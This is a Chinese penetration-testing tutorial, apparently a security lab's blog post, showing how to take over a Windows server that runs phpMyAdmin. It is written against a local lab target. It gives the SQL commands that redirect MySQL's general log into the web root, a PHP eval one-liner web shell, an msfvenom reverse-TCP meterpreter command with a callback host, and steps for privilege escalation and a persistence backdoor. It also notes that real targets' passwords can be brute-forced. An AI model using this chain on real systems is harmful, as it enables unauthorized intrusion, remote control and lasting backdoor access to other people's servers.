msf实战提权windows_phpmyadmin getshell到提权

土拨鼠先生

一. 环境准备:

靶机:win7 32 位。

环境:

php:5.45

MYsql:5.5.53

Apache:2.4s

二. 开始攻击。

访问目标站点,发现开启3306 端口,

经过弱口令,爆破,目录泄露等途径已经获知PhpMyadmin的账号密码是root root

1.开始登陆到目标服务器的PhpMyadmin

a901393eb6b074c2e24b092e70a95ae6.png

2.检测MySQL全局变量(generallog、generallog file)的值。

general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。

general log file 指的是日志的保存路径。

SHOW VARIABLES LIKE 'general%'

8b055fe65adfe2703eff2b2576f1cba2.png

已知general_log默认是关闭的,log日志存放的位置是C:phpMySQLdataSC-201805120002.log

开启generallog 的作用,开启它可以记录用户输入的每条命令,会把其保存在C:phpMySQLdataSC-201805120002.log下的一个log文件中,其实就是我们常说的日志文件。利用的思路是开启generallog之后把generallogfile的值修改为我们网站默认路径下一个自定义的php文件中,然后我们通过log日志进行写入一句话后门到上面去,然后再进一步利用。

set global general_log = "ON";
SET global general_log_file='C:/php/WWW/testshell.php'; 

10377d67c6fa2f372f7bfb4ca25e31ea.png

7ff14f9f81b4580ebf7176279333370c.png

在网站的根路径下生成了testshell.php的文件夹。

  1. ### 然后执行插入一句话木马。
select'<?php eval($_POST[cmd]);?>';

cbf8e214c719fa6886befd4ad228e260.png

### 这时通过浏览访问一下一句话木马。

850ebb002702a2a482b87192fdf090b7.png

ba56871b783c8f214e0fd5bc013db1d3.png

5.通过蚁剑连接一句话木马。

52d680fe65989111b0cd2b2288932aa7.png

发现现在获取的权限为administrator权限,通过msf下getsystem来进行提权。

  1. ### 生成exe的反弹连接木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4444-f exe >testshell.exe

4ddc3f0c3f808f5dc2dae6f788d15d62.png

将生成的木马通过蚁剑上传到目标服务器并执行。

eb7d0facd7cab0eb1a37950aa125a72c.png

7.开msf监听,

600aefaf67224818cab6b5c361ed68b0.png
  1. ### 建立后门。

生成的后门文件路径:

6e6b74403a7f8563ae5ab2af03c9835c.png

后门加载成功

利用方式:

当用户登录到远程系统时,为我们打开一个Meterpreter会话

777675d77d3f0cb4e541c07632fcb556.png

1.### 连接后门

3d5142cde881a1c5afbc242b9d5f53ea.png

成功。

总结:

1.在获取密码的过程中由于是本地搭建的,所以是知道密码的在实际使用中可以采用爆破的方式获取密码。

2.在获取一句话反弹连接后尝试获取密码失败,后面在msf下获取hash成功获取目标登录密码。

扫描下方二维码学习更多WEB安全知识:

8616905ce6f0cba946335512775bcc55.png

690510b2aead0be87bf2fb92f1d3a90f.png
Ms08067安全实验室

专注于普及网络安全知识。团队已出版《Web安全攻防:渗透测试实战指南》,《内网安全攻防:渗透测试实战指南》,目前在编Python渗透测试,JAVA代码审计和二进制逆向方面的书籍。

团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。

官方网站:http://www.ms08067.com

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值